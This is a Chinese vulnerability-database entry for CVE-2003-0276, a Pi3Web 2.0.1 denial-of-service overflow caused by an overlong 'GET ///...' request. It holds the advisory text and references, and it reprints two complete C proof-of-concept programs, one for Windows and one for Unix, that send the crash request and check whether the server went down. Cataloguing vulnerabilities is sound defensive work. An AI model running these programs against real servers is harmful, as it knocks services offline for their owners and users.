CVE-2003-0276
CVSS5.0
发布时间 :2003-06-16 00:00:00
修订时间 :2016-10-17 22:31:36
NMCOE    

[原文]Buffer overflow in Pi3Web 2.0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a GET request with a large number of / characters.


[CNNVD]Pi3Web畸形GET请求远程拒绝服务攻击漏洞(CNNVD-200306-066)

        
        Pi3Web是一款小型WEB服务程序。
        Pi3Web服务程序对畸形GET请求缺少正确处理,远程攻击者可以利用这个漏洞对WEB服务进行拒绝服务攻击。
        攻击者提交超长的'GET ///...'请求给Pi3Web服务程序,会导致进程不稳定,停止对正常服务的响应。目前不确定其他系统平台上是否存在此漏洞。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0276
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0276
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-066
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105155818012718&w=2
(UNKNOWN)  BUGTRAQ  20030428 Pi3Web 2.0.1 DoS
http://marc.info/?l=bugtraq&m=105275789410250&w=2
(UNKNOWN)  BUGTRAQ  20030512 Unix Version of the Pi3web DoS
http://www.securityfocus.com/bid/7555
(UNKNOWN)  BID  7555
http://xforce.iss.net/xforce/xfdb/11889
(UNKNOWN)  XF  pi3web-get-request-bo(11889)

- 漏洞信息

Pi3Web畸形GET请求远程拒绝服务攻击漏洞
中危 其他
2003-06-16 00:00:00 2006-09-23 00:00:00
远程  
        
        Pi3Web是一款小型WEB服务程序。
        Pi3Web服务程序对畸形GET请求缺少正确处理,远程攻击者可以利用这个漏洞对WEB服务进行拒绝服务攻击。
        攻击者提交超长的'GET ///...'请求给Pi3Web服务程序,会导致进程不稳定,停止对正常服务的响应。目前不确定其他系统平台上是否存在此漏洞。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 建立管理员通过WEP保护的无线连接管理接口。
        厂商补丁:
        Pi3
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://pi3web.sourceforge.net/pi3web/files/

- 漏洞信息 (22)

Pi3Web 2.0.1 Denial of Service - Proof of Concept (EDBID:22)
windows dos
2003-04-29 Verified
0 aT4r
N/A [点击下载]
/* Pi3Web 2.0.1 DoS - Pr00f of concept.
*
* Vulnerable systems: Pi3Web 2.0.1 (maybe others)
* Vendor: www.johnroy.com/pi3  - http://pi3web.sourceforge.net/
* Patch: no yet.
*
* Info: Pi3Web Server is vulnerable to a denial of Service.
* when a malformed HTTP Request is done the webserver hangs 
* due to an stack overflow. GET /////////..[354]../////////
*
* Found by aT4r@3wdesign.es  04/26/2003
* Compiled with: lcc-win32 v3.3.
*
*/

#pragma comment (lib,"ws2_32")
#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
#include <string.h>

char evilbuffer[1024],evilrequest[512],ip[15];
short port=80;


int isalive(int OPT)
{
	struct sockaddr_in haxorcitos;
	int fd;

	haxorcitos.sin_port = htons(port);
	haxorcitos.sin_family = AF_INET;
	haxorcitos.sin_addr.s_addr = inet_addr(ip);

	if ((fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
	{
		printf(" [-] Unable to Create Socket\n\n");
		return(0);
	}
	if (connect(fd,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos)) == -1)
	{
		if (OPT==0)
			printf(" [+] Exploit Success. Remote webserver shutdown\n");
		else
			printf(" [-] Unable to connect\n\n");
		return(0);
	}
	if (OPT==0)
	{
		printf(" [-] Exploit Failed. System Patched?\n\n");
	}
	else
	{
		send(fd,evilbuffer, strlen(evilbuffer),0);
		printf(" [+] Data Sent. Now Checking Host\n");
		closesocket(fd);

	}
return(1);
}


void usage(void)
{
	printf(" [+] Usage: PiDoS.exe HOST [port]\n\n");	exit(1);
}


void main(int argc,char *argv[])
{
	WSADATA ws;

	if	(WSAStartup( MAKEWORD(1,1), &ws )!=0)
	{
		printf(" [+] WSAStartup() error\n");
		exit(0);
	}

	printf("\n . .. ...:Pi3Web Denial of Service (aT4r@3wdesign.es) :... 
..\n\n");

	if ((argc!=2) && (argc!=3))
		usage();

	strcpy(ip,argv[1]);
	if (argc==3) port=atoi(argv[2]);

	memset(evilrequest,0,512);
	memset(evilbuffer,0,1024);
	memset(evilrequest,'/',354);
	//sprintf(evilbuffer, "GET %s\r\n",evilrequest);
	sprintf(evilbuffer,"GET %s HTTP/1.0\r\nUser-Agent: foo\r\nHost: 
%s\r\n\r\n\r\n",evilrequest,argv[2]);

	if (isalive(1))
		{ sleep(1000); isalive(0);}

}

// milw0rm.com [2003-04-29]
		

- 漏洞信息 (22587)

Pi3Web 2.0.1 Malformed GET Request Denial Of Service Vulnerability (EDBID:22587)
windows dos
2003-04-26 Verified
0 Angelo Rosiello
N/A [点击下载]
source: http://www.securityfocus.com/bid/7555/info

It has been reported that Pi3Web server is prone to a denial of service vulnerability. Reportedly, when a malicious GET request is sent to the Pi3Web server the server will fail. It should be noted that the Unix version has been reported vulnerable, it is not currently known if other platforms are affected.

/*
 * Unix Version of the Pi3web DoS.
 * ----------------------------------------------------------
 * Info: Pi3Web Server is vulnerable to a denial of Service.
 * ----------------------------------------------------------
 * VULNERABILITY:
 * GET //// <- 354
 *
 * The bug was found by aT4r@3wdesign.es 04/26/2003
 * www.3wdesign.es Security
 * ----------------------------------------------------------
 * Unix Version Credits.
 * AUTHOR : Angelo Rosiello
 * CONTACT: angelo@rosiello.org, angelo@dtors.net
 *
*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
#include <assert.h>

void addr_initialize();

int main(int argc, char **argv)
{
  int i, port, sd, rc;
  char buffer[355];
  char *get = "GET";
  char packet[360];
  struct sockaddr_in server;

  if(argc > 3 || argc < 2)
  {
    printf("USAGE: %s IP PORT\n", argv[0]);
    printf("e.g. ./pi3web-DoS 127.0.0.1 80\n");
    exit(0);
  }
  if(argc == 2) port = 80;
  else port = atoi(argv[2]);

  for(i = 0; i < 355; i++) buffer[i] = '/'; //Build the malformed request
  sprintf(packet, "%s %s\n", get, buffer);
  addr_initialize(&server, port, (long)inet_addr(argv[1]));

  sd = socket(AF_INET, SOCK_STREAM, 0);
  if(sd < 0) perror("Socket");
  assert(sd >= 0);
  rc = connect(sd, (struct sockaddr *) &server, sizeof(server));
  if(rc != 0) perror("Connect");
  assert(rc == 0);
  printf("\n\t\t(c) 2003 DTORS Security\n");
  printf("\t\tUnix Version DoS for Pi3web\n");
  printf("\t\tby Angelo Rosiello\n\n");
  write(sd, packet, strlen(packet)); //Caput!
  printf("Malformed packet sent!\n");
  close(sd);

  printf("Checking if the server crashed...\n");
  sleep(3);

  sd = socket(AF_INET, SOCK_STREAM, 0);
        if(sd < 0) perror("Socket");
  assert(sd >= 0);
  rc = connect(sd, (struct sockaddr *) &server, sizeof(server));
  if(rc != 0)
  {
    printf("The server is dead!\n");
    exit(0);
  }
  else if(rc == 0) printf("The server is not vulnerable!\n");
  close(sd);
  exit(0);
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
        address -> sin_family = AF_INET;
        address -> sin_port = htons((u_short)port);
        address -> sin_addr.s_addr = IPaddr;
}

/*EOF*/

		

- 漏洞信息

11091
Pi3Web Malformed GET Request Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-04-28 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站